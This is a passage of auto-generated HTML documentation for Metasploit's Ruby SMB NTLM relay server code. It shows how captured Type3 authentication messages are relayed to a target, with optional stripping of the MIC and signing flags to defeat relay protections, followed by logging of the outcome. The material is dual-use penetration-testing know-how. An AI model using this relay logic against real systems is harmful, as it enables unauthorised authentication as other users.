<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Gss</span><span class='op'>::</span><span class='const'>Provider</span><span class='op'>::</span><span class='const'>Result</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='kw'>nil</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_LOGON_FAILURE</span><span class='rparen'>)</span>
<span class='comment'># NTLM challenge response
</span> <span class='kw'>elsif</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type3</span><span class='rparen'>)</span>
<span class='id identifier rubyid_relayed_connection'>relayed_connection</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relayed_connection</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_info'>info</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Relaying </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_ntlm_version'>ntlm_version</span> <span class='op'>==</span> <span class='symbol'>:ntlmv2</span> <span class='op'>?</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>NTLMv2</span><span class='tstring_end'>&#39;</span></span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>NTLMv1</span><span class='tstring_end'>&#39;</span></span><span class='embexpr_end'>}</span><span class='tstring_content'> type 3 message to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> as </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_and_sign_key_exch_flags'>drop_mic_and_sign_key_exch_flags</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic_and_flags'>do_drop_mic_and_flags</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_only'>drop_mic_only</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic'>do_drop_mic</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>=</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_relay_ntlmssp_type3'>relay_ntlmssp_type3</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_is_success'>is_success</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='op'>&amp;.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_SUCCESS</span>
<span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_end'>on_relay_end</span><span class='lparen'>(</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='label'>identity:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='label'>is_success:</span> <span class='id identifier rubyid_is_success'>is_success</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_is_success'>is_success</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Successfully authenticated against relay target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:incoming_challenge_response</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span>
<span class='ivar'>@listener</span><span class='period'>.</span><span class='id identifier rubyid_on_ntlm_type3'>on_ntlm_type3</span><span class='lparen'>(</span>
<span class='label'>address:</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span>
<span class='label'>ntlm_type1:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:incoming_negotiate_message</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>ntlm_type2:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target_server_challenge</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>ntlm_type3:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:incoming_challenge_response</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>service_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SMB</span><span class='tstring_end'>&#39;</span></span>
<span class='rparen'>)</span>
<span class='ivar'>@listener</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_success'>on_relay_success</span><span class='lparen'>(</span><span class='label'>relay_connection:</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='comma'>,</span> <span class='label'>relay_identity:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='ivar'>@listener</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_failure'>on_relay_failure</span><span class='lparen'>(</span><span class='label'>relay_connection:</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='rparen'>)</span>
<span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_disconnect!'>disconnect!</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Relay against target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed with unknown error</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_LOGON_FAILURE</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Relayed client authentication failed on target server </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_error_code'>error_code</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='period'>.</span><span class='id identifier rubyid_find_by_retval'>find_by_retval</span><span class='lparen'>(</span><span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span>
<span class='kw'>if</span> <span class='id identifier rubyid_error_code'>error_code</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Relay against target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed with unexpected error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Relay against target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed with unexpected error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_error_code'>error_code</span><span class='period'>.</span><span class='id identifier rubyid_name'>name</span><span class='embexpr_end'>}</span><span class='tstring_content'>: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_error_code'>error_code</span><span class='period'>.</span><span class='id identifier rubyid_description'>description</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='period'>.</span><span class='id identifier rubyid_delete'>delete</span><span class='lparen'>(</span><span class='symbol'>:relay_mode</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span>
<span class='comment'># Should never occur
</span> <span class='kw'>else</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_error'>error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Invalid ntlm request</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Gss</span><span class='op'>::</span><span class='const'>Provider</span><span class='op'>::</span><span class='const'>Result</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='kw'>nil</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_LOGON_FAILURE</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="valid_ntlm_blob?-instance_method">
#<strong>valid_ntlm_blob?</strong>(blob) &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
142
143
144</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 142</span>
<span class='kw'>def</span> <span class='id identifier rubyid_valid_ntlm_blob?'>valid_ntlm_blob?</span><span class='lparen'>(</span><span class='id identifier rubyid_blob'>blob</span><span class='rparen'>)</span>
<span class='id identifier rubyid_blob'>blob</span><span class='op'>&amp;.</span><span class='id identifier rubyid_start_with?'>start_with?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>NTLMSSP\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="validate_ntlm_blob!-instance_method">
#<strong>validate_ntlm_blob!</strong>(blob) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
146
147
148
149
150</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 146</span>
<span class='kw'>def</span> <span class='id identifier rubyid_validate_ntlm_blob!'>validate_ntlm_blob!</span><span class='lparen'>(</span><span class='id identifier rubyid_blob'>blob</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_valid_ntlm_blob?'>valid_ntlm_blob?</span><span class='lparen'>(</span><span class='id identifier rubyid_blob'>blob</span><span class='rparen'>)</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The NTLM blob found was malformed</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:05:36 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink